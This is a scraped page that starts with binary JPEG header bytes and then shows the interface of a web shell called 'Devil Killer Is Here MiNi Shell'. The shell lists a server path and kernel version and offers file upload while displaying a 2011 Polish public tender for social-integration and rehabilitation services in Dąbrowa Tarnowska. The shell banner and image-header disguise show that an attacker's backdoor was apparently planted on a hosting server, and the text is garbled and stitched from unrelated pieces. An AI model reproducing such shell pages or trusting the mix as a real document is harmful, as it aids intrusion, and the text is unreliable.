JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110421/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110421/121449-N-2011.html

<p class="kh_header"><b>Dąbrowa Tarnowska: Aktywna Integracja realizowana w ramach projektu systemowego pn. Dobra Przyszłość - rozwój i upowszechnianie aktywnej integracji przez Powiatowe Centrum Pomocy Rodzinie w Dąbrowie Tarnowskiej.</b><br>
<b>Numer ogłoszenia: 121449 - 2011; data zamieszczenia: 21.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Dąbrowie Tarnowskiej , ul. Berka Joselewicza 5, 33-200 Dąbrowa Tarnowska, woj. małopolskie, tel. 14 642 44 15, faks 14 642 44 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcprdt.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Aktywna Integracja realizowana w ramach projektu systemowego pn. Dobra Przyszłość - rozwój i upowszechnianie aktywnej integracji przez Powiatowe Centrum Pomocy Rodzinie w Dąbrowie Tarnowskiej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest zadanie o nazwie: Aktywna Integracja realizowana w ramach projektu systemowego pn. Dobra Przyszłość - rozwój i upowszechnianie aktywnej integracji przez Powiatowe Centrum Pomocy Rodzinie w Dąbrowie Tarnowskiej.
Przedmiot zamówienia realizowany będzie ściśle w jednym zadaniu Aktywna Integracja  z podziałem na instrumenty aktywnej integracji. 
Wsparciem w ramach projektu objęte zostaną dwie grupy beneficjentów: 
1)	osoby nieaktywne zawodowo zagrożone wykluczeniem społecznym z problemami             w sprawach opiekuńczo - wychowawczych lub z rodzin w kryzysie w tym będące  członkami rodzin zastępczych - 10 osób;
2)	osoby nieaktywne zawodowo zagrożone wykluczeniem społecznym - nieaktywne zawodowo z uwagi na opiekę nad dzieckiem niepełnosprawnym - 15 osób.
Wykonawca zobowiązany będzie do zastosowania wobec wyżej wymienionych grup następujących instrumentów:
A. Grupa pierwsza - instrumenty aktywnej integracji dla osób nieaktywnych zawodowo zagrożonych wykluczeniem społecznym z problemami w sprawach opiekuńczo - wychowawczych lub z rodzin w kryzysie w tym będące  członkami rodzin zastępczych:
1) Instrument aktywności zawodowej - grupowe warsztaty z doradcą zawodowym w ilości  3 godziny; spotkania indywidualne z doradcą zawodowym w ilości  20 godzin. 
Założenia  -  poznanie oczekiwań Uczestników Projektu wobec przyszłej sytuacji zawodowej oraz możliwości i predyspozycji, a także wzbudzenie motywacji do pełnego uczestnictwa               w projekcie. Podniesienie kompetencji życiowych i umiejętności umożliwiających  powrót  do życia społecznego w tym  na rynku pracy i aktywizacji zawodowej. Zajęcia z doradcą winny objąć między innymi umiejętności autoprezentacji i kreowania własnego wizerunku, umiejętność przemawiania i wystąpień publicznych, umiejętność radzenia sobie ze stresem               i pozytywnego wykorzystywania kryzysów, świadomość własnych zasobów i umiejętności.   
Wykonawca w trakcie grupowych warsztatów z doradcą zawodowym zobowiązany jest do zapewnienia usługi cateringowej (obiad - jedno ciepłe danie) oraz barek kawowy w czasie przerw. 
2) Instrument aktywności zdrowotnej - spotkania indywidualne z psychologiem                        lub (i) pedagogiem specjalnym w ilości 60 godzin; wraz z organizacją 2 dniowego zespołu ćwiczeń usprawniających psychoruchowo Uczestników Projektu i członków ich rodzin (nie więcej niż 30 osób). 
Założenia - ogólna poprawa i wzmocnienie sprawności psychicznej uczestników projektu                 i ich podopiecznych. Spotkania z psychologiem winny obejmować w szczególności nawiązywanie i utrzymywanie kontaktów interpersonalnych, likwidacji barier w komunikacji, interpersonalnej, doskonalenie komunikacji werbalnej i pozawerbalnej, określenie norm                    i zasad współżycia w rodzinie i jej otoczeniu, umacnianie więzi i budowanie właściwych relacji w kontekście rodziny i jej otoczenia. Trening redukcji frustracji, planowanie własnego rozwoju w kontekście zachowania właściwej funkcji w rodzinie.

Wykonawca zobowiązany będzie do ubezpieczenia uczestników zespołu ćwiczeń                        od następstw nieszczęśliwych wypadków. Okres ubezpieczenia obejmie cały okres trwania ćwiczeń. Wykonawca dokona ubezpieczenia uczestników na podstawie imiennej listy sporządzonej przez Zamawiającego. Wykonawca przedstawi Zamawiającemu kopię polisy ubezpieczeniowej najpóźniej w dniu rozpoczęcia ćwiczeń.
Uczestnicy projektu w trakcie trwającego zespołu ćwiczeń powinni mieć zapewnione zakwaterowanie, całodzienne wyżywienie oraz kompleksową rehabilitację.
Miejsce realizacji zadania (zakwaterowanie + realizacja zajęć) ma znajdować się  w Polsce,  w odległości nie większej od Dąbrowy Tarnowskiej niż 40 km. Wszyscy Uczestnicy projektu powinni zostać zakwaterowani w jednym ośrodku rehabilitacyjno - wypoczynkowym posiadającym aktualny wpis do rejestru ośrodków uprawnionych do przyjmowania osób niepełnosprawnych. Na terenie ośrodka ma znajdować się sala konferencyjna w której wykonawca przeprowadzi zajęcia. Wykonawca zapewni Uczestnikom Projektu wyżywienie w formie  trzech posiłków, tj. śniadanie, obiad (dwa dania + deser), kolacja. Dzienna stawka wyżywienia dla jednej osoby nie może być niższa niż 60 zł. Wykonawca zapewnia transport Uczestników Projektu z Dąbrowy Tarnowskiej do miejsca realizacji zadania i z powrotem oraz ubezpieczenie.
3) Instrument aktywności zdrowotnej - uczestnictwo w kursie pierwszej pomocy w ilości  3 godzin. 
Założenia - przekazanie Uczestnikom Projektu podstawowej wiedzy z zakresu udzielania pierwszej pomocy (w tym również reanimacji i resuscytacji) w oparciu o fachowy personel. Zadanie realizowane być powinno również w oparciu o zajęcia praktyczne za pomocą specjalistycznych fantomów i innego adekwatnego sprzętu. Zajęcia odbywać się winny na terenie Dąbrowy Tarnowskiej. 
Wykonawca w trakcie zajęć zobowiązany jest do zapewnienia usługi cateringowej (obiad - jedno ciepłe danie) oraz barek kawowy w czasie przerw. 
4) Instrument aktywności społecznej - grupowe warsztaty z prawnikiem w ilości 6 godzin; 
spotkania indywidualne z prawnikiem w ilości 10
Założenia - udzielenie informacji o prawach i uprawnieniach służących przywracaniu samodzielności życiowej w tym powrót na rynek pracy. Prowadzenie spotkań                                  z  Uczestnikami Projektu m.in. z zakresu prawa pracy, prawa ubezpieczeń społecznych, prawa cywilnego, prawa rodzinnego i opiekuńczego, prawa karnego, prawa świadczeń rodzinnych pod kątem pomocy rodzinom wieloproblemowym.
Wykonawca w trakcie grupowych warsztatów z prawnikiem zobowiązany jest                                   do zapewnienia usługi cateringowej (obiad - jedno ciepłe danie) oraz barek kawowy w czasie przerw. 
5) Instrument aktywności społecznej - organizacja i finansowanie udziału Uczestników Projektu w grupie samopomocy działającej na terenie Powiatu Dąbrowskiego w skład, której wchodzą Uczestnicy Projektu Dobra Przyszłość - rozwój i upowszechnianie aktywnej integracji. Projektu realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Dąbrowie Tarnowskiej w latach 2008 - 2010. Ilość 12 godzin. 
Założenia - poprzez udział w grupie samopomocy Uczestnicy Projektu mają mieć możliwość dzielenia się swoimi problemami i uświadomienia sobie, że nie są pozostawieni sami sobie, dzięki temu z kolei widzą, że nie tylko oni są w takiej sytuacji. Mają również szansę na odzyskanie wiary we własne możliwości oraz wzrost poczucia własnej wartości. W grupie czują się pewniej, szczególnie w sytuacjach walki o własne prawa  i przywileje czy występowania we własnym interesie. Ponadto wzrasta ich aktywność społeczna w innych płaszczyznach życia, takich jak: udział w wolontariacie, uczestniczenie w życiu kulturalnym, inicjowanie różnego rodzaju działań.
Wykonawca w trakcie spotkania grupy samopomocowej zobowiązany jest do zapewnienia usługi cateringowej w postaci barku kawowego i kanapek. 

B. Grupa druga - instrumenty aktywnej integracji dla osób nieaktywnych zawodowo zagrożonych wykluczeniem społecznym - nieaktywnych zawodowo z uwagi na opiekę nad dzieckiem niepełnosprawnym:
1) Instrument aktywności zawodowej - grupowe warsztaty z doradcą zawodowym w ilości  3 godzin; spotkania indywidualne z doradcą zawodowym w ilości  30 godzin. 
Założenia  -  poznanie oczekiwań Uczestników Projektu wobec przyszłej sytuacji zawodowej oraz możliwości i predyspozycji, a także wzbudzenie motywacji do pełnego uczestnictwa w projekcie. Podniesienie kompetencji życiowych i umiejętności umożliwiających  powrót do życia społecznego w tym  na rynku pracy i aktywizacji zawodowej. Zajęcia z doradcą winny objąć między innymi umiejętności autoprezentacji i kreowania własnego wizerunku, umiejętność przemawiania i wystąpień publicznych, umiejętność radzenia sobie ze stresem                 i pozytywnego wykorzystywania kryzysów, świadomość własnych zasobów i umiejętności.
Wykonawca w trakcie grupowych warsztatów z doradcą zawodowym zobowiązany jest do zapewnienia usługi cateringowej (obiad - jedno ciepłe danie) oraz barek kawowy w czasie przerw.
 2) Instrument aktywności zdrowotnej - grupowe warsztaty z psychologiem w ilości                      6 godzin; spotkania indywidualne z psychologiem w ilości 30 godzin. 
Założenia - ogólna poprawa i wzmocnienie sprawności psychicznej uczestników projektu                    i ich podopiecznych. Rodzice winni odbyć szkolenia z komunikacji, agresji  i autoagresji oraz seksualności dzieci i młodzieży z niepełnosprawnością intelektualną. Spotkania                          z psychologiem winny pozwolić Uczestnikom Projektu poznać tajniki skutecznego komunikowania się z niepełnosprawnym dzieckiem oraz ukazać związek między komunikacją a zachowaniem osób niepełnosprawnych. Celem spotkań będzie nauczenie się eliminowania zachowań trudnych u siebie i dziecka oraz przedstawienie zasad postępowania w przypadku agresji dziecka niepełnosprawnego. 
Wykonawca w trakcie grupowych warsztatów z psychologiem zobowiązany jest do zapewnienia usługi cateringowej (obiad - jedno ciepłe danie) oraz barek kawowy w czasie przerw.
3) Instrument aktywności zdrowotnej - grupowe warsztaty z rehabilitantem w ilości                              4 godzin; spotkania indywidualne  z rehabilitantem w ilości 180 godzin. 
Założenia - ogólna poprawa i wzmocnienie sprawności fizycznej i psychoruchowej Uczestników Projektu i ich podopiecznych. Spotkania z rehabilitantem obejmują wczesną interwencję dzieci z opóźnieniem psychoruchowym i z uszkodzeniami układu nerwowego,           a także usprawnianie podopiecznych systematycznie korzystających z pomocy, co pozwala osiągnąć im rytmiczną stabilizację. 
Wykonawca w trakcie grupowych warsztatów z rehabilitantem zobowiązany jest do zapewnienia usługi cateringowej (obiad - jedno ciepłe danie) oraz barek kawowy w czasie przerw.
Wykonawca zapewni uczestnikom dostęp do sprzętu rehabilitacyjnego niezbędnego do przeprowadzenia zajęć.
4) Instrument aktywności zdrowotnej - grupowe warsztaty z pedagogiem specjalnym                 w ilości 4 godzin; spotkania indywidualne z pedagogiem specjalnym w ilości 90 godzin. 
Założenia - czuwanie i budowanie integracji pomiędzy rodzicami dzieci pełnosprawnych                i niepełnosprawnych, wspieranie rodziców dzieci niepełnosprawnych poprzez: kształtowanie prawidłowej postawy rodzicielskiej wobec własnego dziecka, udzielanie codziennych instruktaży dotyczących pracy z dzieckiem, udzielanie porad związanych z koniecznością skorzystania z dodatkowej pomocy innych specjalistów czy instytucji społecznych                           (i wskazywanie ich). Przywracanie powierzonym swej opiece jednostkom w taki czy inny sposób uszkodzonym lub niedostosowanym społecznie, normy możliwej do osiągnięcia przez wielokierunkowe oddziaływanie na ich zaburzone warunki bio - psycho - społeczne dla umożliwienia im znalezienia należnego im miejsca w społeczeństwie i w życiu osobistym.
Wykonawca w trakcie grupowych warsztatów z psychologiem zobowiązany jest do zapewnienia usługi cateringowej (obiad - jedno ciepłe danie) oraz barek kawowy w czasie przerw
5) Instrument aktywności zdrowotnej - warsztaty grupowe z logopedą w ilości 4 godzin; spotkania indywidualne z logopedą w ilości  90 godzin. 
Założenia - terapia zaburzeń artykulacyjnych i zaburzeń mowy różnego pochodzenia, wspieranie rozwoju mowy i porozumiewania się alternatywnego (dzieci niemówiące                                  i słabomówiące), terapia mowy po całkowitej lub częściowej jej utracie, z elementami wczesnej interwencji terapeutycznej u dzieci w wieku poniemowlęcym, a także terapią pedagogiczną młodzieży oraz dzieci z tzw. grupy ryzyka dysleksji.
Wykonawca w trakcie grupowych warsztatów z psychologiem zobowiązany jest do zapewnienia usługi cateringowej (obiad - jedno ciepłe danie) oraz barek kawowy w czasie przerw
6) Instrument aktywności zdrowotnej - uczestnictwo w kursie pierwszej pomocy w ilości  4 godzin. 
Założenia - przekazanie Uczestnikom Projektu podstawowej wiedzy z zakresu udzielania pierwszej pomocy (w tym również reanimacji i resuscytacji) w oparciu o fachowy personel. Zadanie realizowane być powinno również w oparciu o zajęcia praktyczne za pomocą specjalistycznych fantomów i innego adekwatnego sprzętu. Zajęcia odbywać się winny w na terenie Dąbrowy Tarnowskiej. 
Wykonawca w trakcie zajęć zobowiązany jest do zapewnienia usługi cateringowej (obiad - jedno ciepłe danie) oraz barek kawowy w czasie przerw. 
7) Instrument aktywności zdrowotnej - organizacja 2 - dniowego zespołu ćwiczeń usprawniających psychoruchowo Uczestników Projektu i ich podopiecznych (nie więcej niż 30 osób). 
Założenia - ogólna poprawa i wzmocnienie sprawności fizycznej i psychicznej uczestników projektu i ich podopiecznych. 
Wykonawca ma obowiązek dostosować program ćwiczeń do stopnia sprawności poszczególnych osób.
Wykonawca zobowiązany będzie do ubezpieczenia uczestników ćwiczeń od następstw nieszczęśliwych wypadków. Okres ubezpieczenia obejmie cały okres trwania ćwiczeń. Wykonawca dokona ubezpieczenia uczestników na podstawie imiennej listy sporządzonej przez Zamawiającego. Wykonawca przedstawi Zamawiającemu kopię polisy ubezpieczeniowej najpóźniej w dniu rozpoczęcia ćwiczeń.
Uczestnicy projektu w trakcie trwającego zespołu ćwiczeń powinni mieć zapewnione zakwaterowanie, całodzienne wyżywienie oraz kompleksową rehabilitację obejmującą:
- zabiegi z zakresu fizykoterapii, 
- zabiegi z zakresu kinezyterapii, 
- hipoterapię,
- dogoterapię, 
- terapię zajęciową, 
- konsultacje psychologiczne i logopedyczne, 
- grupową rehabilitację społeczną.
Miejsce realizacji zadania (zakwaterowanie + realizacja zajęć) ma znajdować się w Polsce,                w odległości nie większej od Dąbrowy Tarnowskiej niż 40 km. Wszyscy Uczestnicy projektu powinni zostać zakwaterowani w jednym ośrodku rehabilitacyjno - wypoczynkowym posiadającym aktualny wpis do rejestru ośrodków uprawnionych do przyjmowania osób niepełnosprawnych. Wykonawca zapewni Uczestnikom Projektu wyżywienie w formie  trzech posiłków tj. śniadanie, obiad (dwa dania + deser), kolacja. Dzienna stawka wyżywienia dla jednej osoby nie może być niższa niż 60 zł.
Wykonawca zapewnia transport Uczestników Projektu z Dąbrowy Tarnowskiej do miejsca realizacji zadania i z powrotem oraz ubezpieczenie.
8) Instrument aktywności społecznej - grupowe warsztaty z prawnikiem w ilości 6 godzin; 
spotkania indywidualne z prawnikiem w ilości 15 godzin. 
Założenia - udzielenie informacji o prawach i uprawnieniach służących przywracaniu samodzielności życiowej w tym powrót na rynek pracy. Prowadzenie spotkań                                 z  Uczestnikami Projektu m.in. z zakresu prawa pracy, prawa ubezpieczeń społecznych, prawa cywilnego, prawa rodzinnego i opiekuńczego, prawa karnego, prawa świadczeń rodzinnych pod kątem pomocy rodzinom z niepełnosprawnym członkiem.
Wykonawca w trakcie grupowych warsztatów z prawnikiem zobowiązany jest do zapewnienia usługi cateringowej (obiad - jedno ciepłe danie) oraz barek kawowy w czasie przerw.
8) Instrument aktywności społecznej - organizacja i finansowanie udziału Uczestników Projektu w grupie samopomocy działającej na terenie Powiatu Dąbrowskiego, w skład  której wchodzą Uczestnicy Projektu Dobra Przyszłość - rozwój i upowszechnianie aktywnej integracji. Projektu realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Dąbrowie Tarnowskiej w latach 2008 - 2010. Ilość 12 godzin. 
Założenia - poprzez udział w grupie samopomocy Uczestnicy Projektu winni mieć  możliwość dzielenia się swoimi problemami i nie są pozostawieni sami sobie, dzięki temu z kolei uświadomić sobie, że nie tylko oni są w takiej sytuacji. Winni mieć również szansę na odzyskanie wiary we własne możliwości oraz wzrost poczucia własnej wartości. W grupie czują się pewniej, szczególnie w sytuacjach walki o własne prawa i przywileje czy występowania we własnym interesie. Ponadto wzrasta ich aktywność społeczna w innych płaszczyznach życia, takich jak: udział w wolontariacie, uczestniczenie w życiu kulturalnym, inicjowanie różnego rodzaju działań.
Wykonawca w trakcie spotkania grupy samopomocowej zobowiązany jest do zapewnienia usługi cateringowej w postaci barku kawowego i kanapek. 

II. Wykonawca zobowiązany jest wyposażyć każdego Uczestnika Projektu w trakcie poszczególnych warsztatów grupowych w materiały piśmiennicze (długopis, ołówek, gumka, notatnik) oraz materiałów dydaktycznych zgodnie z zakresem tematycznym zajęć, jak również do przekazania jednego kompletu materiałów dydaktycznych (do zajęć teoretycznych) dla Zamawiającego (jeżeli zachodzi taka konieczność, Wykonawca wlicza                  w cenę szkolenia koszt przeznaczonego dla zamawiającego zestawu materiałów dydaktycznych). Komplet materiałów dydaktycznych Wykonawca dostarczy do Zamawiającego, najpóźniej w dniu rozpoczęcia zajęć. Materiały powinny być oznaczone logo POKL i przekazane Uczestnikom Projektu za potwierdzeniem odbioru. Oznakowanie materiałów powinno być zgodne z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, Departamentu Zarządzania Europejskim Funduszem Społecznym, Ministerstwa Rozwoju Regionalnego, Instytucji Zarządzającej Programem Operacyjnym Kapitał Ludzki - Warszawa, 4 luty 2009 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Usługi o charakterze analogicznym do zamówienia podstawowego do wartości 50 % zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.14.21.00-7, 85.31.25.10-7, 85.12.12.70-6, 80.56.20.00-1, 80.34.00.00-9, 79.11.10.00-5, 55.00.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie będzie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnieniu wymogów z art. 22 ust. 1 ustawy Pzp- według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnieniu wymogów z art. 22 ust. 1 ustawy Pzp- według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnieniu wymogów z art. 22 ust. 1 ustawy Pzp- według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnieniu wymogów z art. 22 ust. 1 ustawy Pzp- według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnieniu wymogów z art. 22 ust. 1 ustawy Pzp- według załącznika nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
